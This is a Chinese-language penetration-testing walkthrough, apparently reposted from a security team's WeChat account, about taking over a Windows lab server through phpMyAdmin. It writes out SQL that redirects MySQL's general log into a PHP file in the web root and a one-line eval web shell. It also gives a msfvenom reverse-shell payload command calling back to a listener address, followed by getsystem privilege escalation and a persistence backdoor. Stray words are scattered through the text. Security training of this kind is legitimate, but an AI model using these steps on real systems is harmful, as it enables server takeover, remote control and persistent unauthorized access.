phpmyadmin getshell到提權

一. 環境準備:

靶機:win7 32 位。php

環境:web

php:5.45sql

MYsql:5.5.53shell

Apache:2.4swindows

二. 開始攻擊。

訪問目標站點,發現開啓3306 端口,安全

通過弱口令,爆破,目錄泄露等途徑已經獲知PhpMyadmin的帳號密碼是root root服務器

1.開始登錄到目標服務器的PhpMyadmin

2.檢測MySQL全局變量(generallog、generallog file)的值。

general log 指的是日誌保存狀態,一共有兩個值(ON/OFF)ON表明開啓 OFF表明關閉。微信

general log file 指的是日誌的保存路徑。網絡

  
    
  
  
   
   
            
   
   
  1. app

SHOW VARIABLES LIKE 'general%'

已知general_log默認是關閉的,log日誌存放的位置是C:\php\MySQL\data\SC-201805120002.log

開啓generallog 的做用,開啓它能夠記錄用戶輸入的每條命令,會把其保存在C:\php\MySQL\data\SC-201805120002.log下的一個log文件中,其實就是咱們常說的日誌文件。利用的思路是開啓generallog以後把generallogfile的值修改成咱們網站默認路徑下一個自定義的php文件中,而後咱們經過log日誌進行寫入一句話後門到上面去,而後再進一步利用。

  
    
  
  
   
   
            
   
   
set global general_log = "ON";SET global general_log_file='C:/php/WWW/testshell.php';

在網站的根路徑下生成了testshell.php的文件夾。

  1. ### 而後執行插入一句話木馬。

  
    
  
  
   
   
            
   
   
select '<?php eval($_POST[cmd]);?>';

  1. ### 這時經過瀏覽訪問一下一句話木馬。

5.經過蟻劍鏈接一句話木馬。


發現如今獲取的權限爲administrator權限,經過msf下getsystem來進行提權。

  1. ### 生成exe的反彈鏈接木馬

  
    
  
  
   
   
            
   
   
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4444 -f exe >testshell.exe

將生成的木馬經過蟻劍上傳到目標服務器並執行。

7.開msf監聽,

使用getsystem來進行提權。


  1. ### 創建後門。

生成的後門文件路徑:

後門加載成功

利用方式:

當用戶登陸到遠程系統時,爲咱們打開一個Meterpreter會話

  1. ### 鏈接後門

成功。

總結:

1.在獲取密碼的過程當中因爲是本地搭建的,因此是知道密碼的在實際使用中能夠採用爆破的方式獲取密碼。

2.在獲取一句話反彈鏈接後嘗試獲取密碼失敗,後面在msf下獲取hash成功獲取目標登陸密碼。


掃描下方二維碼學習更多WEB安全知識:







Ms08067安全實驗室
專一於普及網絡安全知識。團隊已出版《Web安全攻防:滲透測試實戰指南》,《內網安全攻防:滲透測試實戰指南》,目前在編Python滲透測試,JAVA代碼審計和二進制逆向方面的書籍。
團隊公衆號按期分享關於CTF靶場、內網滲透、APT方面技術乾貨,從零開始、以實戰落地爲主,致力於作一個實用的乾貨分享型公衆號。
官方網站:www.ms08067.com


本文分享自微信公衆號 - Ms08067安全實驗室(Ms08067_com)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。

相關文章
相關標籤/搜索